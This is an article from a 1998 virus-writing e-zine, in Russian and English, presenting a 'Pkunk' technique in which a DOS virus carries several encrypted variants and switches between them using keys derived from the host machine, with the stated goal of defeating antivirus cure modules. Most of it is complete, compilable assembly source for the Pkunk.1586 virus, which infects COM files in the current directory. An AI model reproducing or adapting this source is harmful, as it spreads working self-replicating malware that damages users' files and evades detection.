[TulaAnti&ViralClub] PRESENTS ...
MooN_BuG, Issue 9, Dec 1998 file 005
Pkunk-технология
by Wet Milk
1. Что такое Pkunk?
~~~~~~~~~~~~~~~~~~~
Pkunk - забавная розовая птичка, которая живет на Gamma
Krueger. Она умеет несколько раз возрождаться после гибели.
Pkunk-технология - новая вирусная технология.
Pkunk.1586 - новый вирус. Он демонстрирует Pkunk-техноло-
гию.
2. Описание идеи
~~~~~~~~~~~~~~~~
Вирус Pkunk.1586 основан на Pkunk-технологии. Он состоит
из следующих частей:
a) Активный вирус
b) N пассивных вирусов. Они сильно зашифрованы, а ключ ни-
кому не известен :)
c) Мутатор
Сначала выполняется мутатор. Он пытается расшифровать один
из пассивных вирусов. Вариант ключа берется где-то в машине,
например, имя каталога, часть ROM BIOS, текущая дата и т.п.
Если удалось, то мутатор копирует расшифрованый вирус в ак-
тивный вирус. Затем мутатор передает управление старому актив-
ному вирусу или новому активному вирусу. Активный вирус рабо-
тает.
Автор антивирусной программы тоже не знает ключа. Поэтому
он легко и быстро делает лечащий модуль только для текущего
активного вируса. Но, вероятно, на каких-то машинах активный
вирус уже другой! Если сохраненных пассивных вирусов много, то
автор антивирусной программы будет писать новые лечащие модули
лет 100 или больше. :)
3. Pkunk.1586
~~~~~~~~~~~~~
Длина: 1586
Инфицирование: COM и EXE в текущем каталоге
Деструкция: нет
Количество пассивных вирусов: 4
Ключ шифрации/дешифрации: вам неизвестен :)
Исходный текст: мутатор и активный вирус, пассивные вирусы
по прежнему зашифрованы
Adios, Earthlings! :)
=== Cut === PKUNK.ENG
Pkunk Technology
by Wet Milk
1. What is Pkunk?
~~~~~~~~~~~~~~~~~
Pkunk is the fun rosy bird living at the Gamma Crueger. It
can reborn some times after the death.
Pkunk Technology is the new virii technology.
Pkunk.1586 is a new virus which demonstrates Pkunk
Technology.
2. Description of the idea
~~~~~~~~~~~~~~~~~~~~~~~~~~
The Pkunk.1586 is based on the Pkunk Technology. It
consists of the following parts:
a) Active virus
b) N passive viruses. They are encoded well and nobody
knows the key :)
c) Mutator
First, mutator works. It attempts decode one of passive
virii. It takes the version of the key at the current
computer, for instance: directory name, part of the ROM BIOS,
current date, etc. If well done then mutator copies the
decoded virus into active virus. When it passes the control to
new active virus or to old active virus. Active virus works.
Author of the a/v software doesn't know key also. Because
of this, he makes easily and fastly the cure module for the
current active virus only. But, perhaps, some files at the
some computers are infected with the another version of active
virus! If there are many encoded passive virii then author of
a/v software will write new and new cure modules... for a 100
years or more. :)
3. Pkunk.1586
~~~~~~~~~~~~~
Length: 1586
Target files: COM and EXE in the current directory
Destruction: no
Passive virii: 4
Encode/decode key: you known't
Source code: only mutator and active virus, passive virii
are still encoded
Adios, Earthlings!
=== Cut ===
=== Cut === PKUNK.ASM
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; PKUNK.1586 by Wet Milk ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Length: 1586 ;;
;; Target: COM/EXE ;;
;; Area: current directory ;;
;; Resident: no ;;
;; Destruction: no ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Compiler: tasm v2.0 ;;
;; Compile: tasm pkunk /m2 ;;
;; Link: tlink pkunk /t ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
.286
Cseg segment
assume cs:cseg, ds:cseg, ss:cseg
org 100h
BUFLEN equ (((Finish-Start)*2)/16)+1
CHECKS1 equ 3A63h
CHECKS2 equ 3DB2h
CHECKS3 equ 51F6h
CHECKS4 equ 4C73h
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Common part ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Start:
call Next
CopyRT db '[PKUNK v1.0] (c) Wet Milk',0
Next:
mov bp, sp
mov bp, [bp]
inc sp
inc sp
sub bp, 103h
jmp short GivMem
RepGiv:
mov ax, es
dec ax
mov ds, ax
mov bx, ds:word ptr [3]
mov ah, 4Ah
sub bx, BUFLEN+1
int 21h
GivMem:
mov ah, 48h
mov bx, BUFLEN
int 21h
jc RepGiv
sub ax, 10h
mov es, ax
mov cs: ImSeg1[bp], ax
push cs
pop ds
lea si, ds:Start[bp]
mov di, 100h
mov cx, Finish-Start
cld
rep movsb
mov ah, 1Ah
lea dx, ds:FDTA[bp]
int 21h
call Mutate ; !!!
FindFirst:
mov ah, 4Eh
lea dx, ds:Maska[bp]
xor cx,cx
RepF:
int 21h
jc NoMore
lea dx, ds:FName[bp]
db 9Ah
dw offset Infect
ImSeg1 dw ?
mov ah,4Fh
jmp RepF
NoMore:
mov ah, 49h
int 21h
mov ah, 62h
int 21h
mov es, bx
mov ds, bx
mov ah, 1Ah
mov dx, 80h
int 21h
call GoHome
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Mutator ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Mutate:
;
FindFirstD:
mov ah, 4Eh
lea dx, MaskaD[bp]
mov cx,10000b
RepD:
int 21h
jc NoMoreD
call TryKey
mov ah,4Fh
jmp RepD
NoMoreD:
ret
; Selector
TryKey:
; 1-st
lea si, GoHome1[bp]
lea bx, FName[bp]
mov cx, EndOfVir1-GoHome1
call DeCode ; Attempt to decode
lea si, GoHome1[bp]
lea bx, FName[bp]
mov cx, EndOfVir1-GoHome1
call CSum ; Count checksum
cmp ds:Result[bp], CHECKS1 ; Is checksum correct
jnz NoCopy1 ; Nope, skip
Copy1: ; Yep, copy
lea si, GoHome1[bp]
lea di, GoHome
mov cx, Infect1-GoHome1
cld
rep movsb
lea si, Infect1[bp]
lea di, Infect
mov cx, EndOfVir1-Infect1
rep movsb
NoCopy1:
lea si, GoHome1[bp]
lea bx, FName[bp]
mov cx, EndOfVir1-GoHome1
call EnCode ; Reset encryption
; 2-nd
lea si, GoHome2[bp]
lea bx, FName[bp]
mov cx, EndOfVir2-GoHome2
call DeCode
lea si, GoHome2[bp]
lea bx, FName[bp]
mov cx, EndOfVir2-GoHome2
call CSum
cmp ds:Result[bp], CHECKS2
jnz NoCopy2
Copy2:
lea si, GoHome2[bp]
lea di, GoHome
mov cx, Infect2-GoHome2
cld
rep movsb
lea si, Infect2[bp]
lea di, Infect
mov cx, EndOfVir2-Infect2
rep movsb
NoCopy2:
lea si, GoHome2[bp]
lea bx, FName[bp]
mov cx, EndOfVir2-GoHome2
call EnCode
; 3-rd
lea si, GoHome3[bp]
lea bx, FName[bp]
mov cx, EndOfVir3-GoHome3
call DeCode
lea si, GoHome3[bp]
lea bx, FName[bp]
mov cx, EndOfVir3-GoHome3
call CSum
cmp ds:Result[bp], CHECKS3
jnz NoCopy3
Copy3:
lea si, GoHome3[bp]
lea di, GoHome
mov cx, Infect3-GoHome3
cld
rep movsb
lea si, Infect3[bp]
lea di, Infect
mov cx, EndOfVir3-Infect3
rep movsb
NoCopy3:
lea si, GoHome3[bp]
lea bx, FName[bp]
mov cx, EndOfVir3-GoHome3
call EnCode
; 4-th
lea si, GoHome4[bp]
lea bx, FName[bp]
mov cx, EndOfVir4-GoHome4
call DeCode
lea si, GoHome4[bp]
lea bx, FName[bp]
mov cx, EndOfVir4-GoHome4
call CSum
cmp ds:Result[bp], CHECKS4
jnz NoCopy4
Copy4:
lea si, GoHome4[bp]
lea di, GoHome
mov cx, Infect4-GoHome4
cld
rep movsb
lea si, Infect4[bp]
lea di, Infect
mov cx, EndOfVir4-Infect4
rep movsb
NoCopy4:
lea si, GoHome4[bp]
lea bx, FName[bp]
mov cx, EndOfVir4-GoHome4
call EnCode
ret
; Encoder
Encode:
mov al, byte ptr [bx]
add [si], al
mov al, byte ptr [bx+1]
xor [si], al
mov al, byte ptr [bx+2]
sub [si], al
inc si
loop Encode
ret
; Decoder
Decode:
mov al, byte ptr [bx+2]
add [si], al
mov al, byte ptr [bx+1]
xor [si], al
mov al, byte ptr [bx]
sub [si], al
inc si
loop Decode
ret
; Checksum counter
CSum:
pusha
sub bx, bx
LoopC:
lodsb
sub ah, ah
add bx, ax
loop LoopC
mov ds:Result[bp], bx
popa
ret
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; DATA ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Result dw ?
;
FDta db 15h dup (?)
FAttr db 0
FTime dw 0
FDate dw 0
Fsize dd 0
FName db 0Eh dup (?)
;
Maska db '*.*',0
MaskaD db 'C:\*.*',0
;
ExeHead dw 0C3C3h ; 00
PartPag dw ? ; 02
PageCnt dw ? ; 04
ReloCnt dw ? ; 06
HdrSize dw ? ; 08
MinMem dw ? ; 0Ah 10
MaxMem dw ? ; 0Ch 12
ReloSS dw ? ; 0Eh 14
ExeSP dw ? ; 10h 16
ChkSum dw ? ; 12h 18
ExeIP dw ? ; 14h 20
ReloCS dw ? ; 16h 22
TablOff dw ? ; 18h 24
Overlay dw ? ; 1Ah 26
FinHead:
;
Jump db 0E9h
XXXX dw ?
Sign db '['
;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Current Virus ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
GoHome:
pop ax
mov ax, word ptr ExeHead[bp]
mov cs:[100h], ax
mov ax, word ptr PartPag[bp]
mov cs:[102h], ax
xor ax, ax
xor bx, bx
xor cx, cx
xor dx, dx
xor si, si
xor di, di
xor bp, bp
push 100h
ret
db 16 dup (?)
;
Infect:
pusha
push es
push ds
cmp word ptr ds:[FSize+2][bp], 0
jz OkLen
jmp Failure
OkLen:
mov ax, 3D02h
int 21h
mov bx,ax
push cs
pop ds
mov ah, 3Fh
mov cx, 4
lea dx, ExeHead
int 21h
cmp byte ptr [PartPag+1], '['
jz Failure
mov al, byte ptr ExeHead
cmp al, 0B8h
jz IsCOM
cmp al, 0E9h
jz IsCOM
cmp al, 0EBh
jz IsCOM
cmp al, 8Ch
jz IsCOM
cmp al, 0B4h
jz IsCOM
cmp al, 0B0h
jz IsCOM
cmp al, 90h
jz IsCOM
jmp Failure
IsCOM:
mov ax, 4202h
sub cx, cx
sub dx, dx
int 21h
sub ax,3
mov XXXX, ax
mov ah, 40h
mov cx, Finish-Start
mov dx, 100h
int 21h
mov ax,4200h
sub cx, cx
sub dx, dx
int 21h
mov ah, 40h
mov cx, 4
mov dx, offset Jump
int 21h
Failure:
mov ah, 3Eh
int 21h
pop ds
pop es
popa
retf
db 64 dup(?)
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Storage Bay ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
GoHome1:
DB 080H,02DH,032H,06DH,0B5H,0EAH,055H
DB 0B8H,0B7H,02DH,032H,08BH,0B5H,0EAH,055H,0B6H,0B7H,0E5H,0F8H
DB 0E5H,0FDH,0E5H,0EFH,0E5H,006H,0E5H,022H,0E5H,0B9H,0E5H,02BH
DB 090H,0B8H,0B7H,0F5H
Infect1:
DB 098H,0B2H,0DAH,07AH,035H,0FAH,0E8H,0B5H
DB 0B8H,0A4H,0B6H,00DH,091H,060H,0B6H,07BH,00BH,0D7H,02DH,000H
DB 0CAH,0D9H,064H,079H,05FH,0B4H,0B8H,05EH,06DH,0B5H,00BH,0D7H
DB 038H,07AH,08AH,0B5H,07DH,0A4H,08BH,058H,06DH,0B5H,07CH,060H
DB 0A4H,0BEH,07CH,00FH,0A4H,0C2H,07CH,00DH,0A4H,0C6H,07CH,04CH
DB 0A4H,0CAH,07CH,064H,0A4H,0AEH,07CH,068H,0A4H,0B2H,07CH,048H
DB 0A4H,0B6H,00DH,0ECH,060H,0B6H,076H,0CDH,0EFH,0CDH,006H,00BH
DB 0D7H,0EBH,0B5H,0B8H,055H,090H,0B5H,064H,078H,05FH,0E6H,0B2H
DB 05EH,0B8H,0B7H,00BH,0D7H,060H,0B8H,076H,0CDH,0EFH,0CDH,006H
DB 00BH,0D7H,064H,078H,05FH,0B4H,0B8H,05EH,091H,0B5H,00BH,0D7H
DB 064H,07AH,00BH,0D7H,0D9H,0B1H,097H,0EDH
EndOfVir1:
GoHome2:
DB 098H,00EH,0D0H,0D1H
DB 011H,0D0H,0C3H,0C5H,0B9H,00BH,072H,0C6H,075H,010H,075H,02DH
DB 075H,012H,075H,0BFH,0A8H,0D0H,0C3H,0CCH,0B5H,064H,005H
Infect2:
DB 0B0H
DB 0C6H,0EEH,08EH,045H,00EH,080H,0C5H,0D0H,034H,0C2H,0BDH,040H
DB 08EH,043H,00EH,07EH,0C5H,072H,0C6H,039H,0C2H,0BDH,0A7H,0F4H
DB 08FH,000H,0C2H,01FH,0E3H,05DH,018H,0DEH,0F1H,0F4H,091H,00BH
DB 072H,0C6H,00AH,072H,0C9H,01FH,0E3H,070H,072H,0C9H,08CH,0F8H
DB 034H,0EAH,08CH,0BBH,034H,0D6H,08CH,0BDH,034H,0D2H,08CH,05CH
DB 034H,0DEH,08CH,0F4H,034H,0DAH,08CH,000H,034H,0C6H,08CH,060H
DB 034H,0C2H,0BDH,080H,050H,08EH,077H,0C9H,0ADH,034H,07BH,0F8H
DB 0C2H,082H,07DH,01BH,07DH,012H,01FH,0E3H,065H,03FH,0C5H,0F4H
DB 090H,00BH,072H,0C6H,00AH,072H,0C9H,01FH,0E3H,0F8H,0D0H,082H
DB 07DH,01BH,07DH,012H,01FH,0E3H,0F4H,090H,00BH,072H,0C6H,00AH
DB 0D0H,0C3H,01FH,0E3H,0F4H,08EH,01FH,0E3H,0F1H,0C9H,0A3H,01DH
EndOfVir2:
GoHome3:
DB 091H,045H,0F9H,0C0H,0C9H,0B9H,0C0H,0B9H,0B9H,089H,071H,0EBH
DB 0BFH,089H,0E6H,0F9H,0E6H,016H,0E6H,004H,0E6H,00BH,0E6H,02FH
DB 0E6H,0BAH,0E6H,028H,006H
Infect3:
DB 099H,0BFH,0D7H,071H,0BBH,078H,008H
DB 0DCH,046H,011H,0C7H,0DAH,06DH,07AH,0F4H,0D5H,0B9H,0F3H,086H
DB 0BEH,008H,0DCH,046H,02BH,039H,075H,088H,0ADH,0C1H,039H,075H
DB 093H,0ADH,0BEH,024H,045H,0B9H,039H,035H,0CBH,096H,0B0H,0BEH
DB 024H,03EH,0B9H,046H,07DH,0CFH,05EH,0ABH,0BEH,046H,07DH,0CDH
DB 05EH,0AFH,0BEH,071H,0BBH,07BH,0E6H,004H,0E6H,00BH,008H,0DCH
DB 0F4H,0B9H,0BBH,032H,02CH,0C6H,00BH,0ADH,0BCH,079H,076H,07DH
DB 0BDH,0B0H,09AH,076H,08DH,0BBH,0B0H,093H,071H,0BBH,07BH,0E6H
DB 004H,0E6H,00BH,008H,0DCH,046H,0C7H,08EH,0BEH,0FCH,01CH,0BDH
DB 0E6H,0FCH,03EH,013H,0B9H,0F4H,0C9H,0B9H,032H,02CH,044H,07DH
DB 0CFH,044H,08DH,0CDH,06DH,079H,0F3H,0B9H,0BCH,0F4H,0EBH,0BFH
DB 008H,0DCH,071H,0BBH,07BH,0E6H,004H,0E6H,00BH,008H,0DCH,0F4H
DB 0B9H,0BBH,032H,02CH,0C6H,00BH,0ADH,0BCH,079H,044H,07DH,0BDH
DB 044H,08DH,0BBH,0FFH,07DH,0CBH,096H,071H,0B9H,07BH,0E6H,004H
DB 0E6H,00BH,008H,0DCH,06DH,079H,0F3H,086H,0BEH,0F4H,0D5H,0B9H
DB 008H,0DCH,06DH,077H,008H,0DCH,0DAH,0C2H,09CH,006H
EndOfVir3:
GoHome4:
DB 0B9H,0A9H
DB 08FH,0CAH,0E6H,001H,0E6H,036H,0E6H,008H,0E6H,02FH,0E6H,0CBH
DB 0E6H,0C2H,0E6H,024H,0FEH
Infect4:
DB 0A1H,0BBH,0F3H,019H,0BFH,094H,004H
DB 0E0H,046H,039H,0C3H,0E2H,00DH,082H,018H,0F5H,0C1H,017H,086H
DB 0BEH,004H,0E0H,046H,0CFH,041H,095H,084H,04DH,0C9H,041H,095H
DB 0B7H,04DH,0BEH,028H,03EH,0C1H,041H,055H,0EFH,0B6H,04CH,0BFH
DB 026H,056H,046H,07DH,0EDH,05EH,0A4H,0BEH,019H,0BFH,07FH,0E6H
DB 008H,0E6H,02FH,004H,0E0H,03EH,0D7H,0C1H,04CH,0AAH,018H,0C1H
DB 0BFH,0DAH,0D0H,0C6H,02FH,04DH,0C0H,081H,096H,07DH,0BDH,04CH
DB 0B9H,096H,0ADH,0BFH,04CH,0AEH,019H,0BFH,07FH,0E6H,008H,0E6H
DB 02FH,004H,0E0H,046H,009H,046H,07DH,0C9H,0BEH,07DH,0EBH,000H
DB 021H,0BDH,0E6H,009H,048H,085H,0EDH,00DH,081H,017H,0C1H,0C0H
DB 018H,08FH,0BBH,004H,0E0H,019H,0BFH,07FH,0E6H,008H,0E6H,02FH
DB 004H,0E0H,018H,0C1H,0BFH,0DAH,0D0H,0C6H,02FH,04DH,0C0H,081H
DB 048H,07DH,0BDH,048H,0ADH,0BFH,0FBH,07DH,0EFH,0B6H,019H,0C1H
DB 07FH,0E6H,008H,0E6H,02FH,004H,0E0H,00DH,081H,017H,086H,0BEH
DB 018H,0F5H,0C1H,004H,0E0H,00DH,093H,004H,0E0H,0E2H,0CAH,0A0H
DB 006H
EndOfVir4:
Finish:
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Part of dropper ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
mov ah, 4Ch
int 21h
Cseg ends
end Start
�=== Cut ===
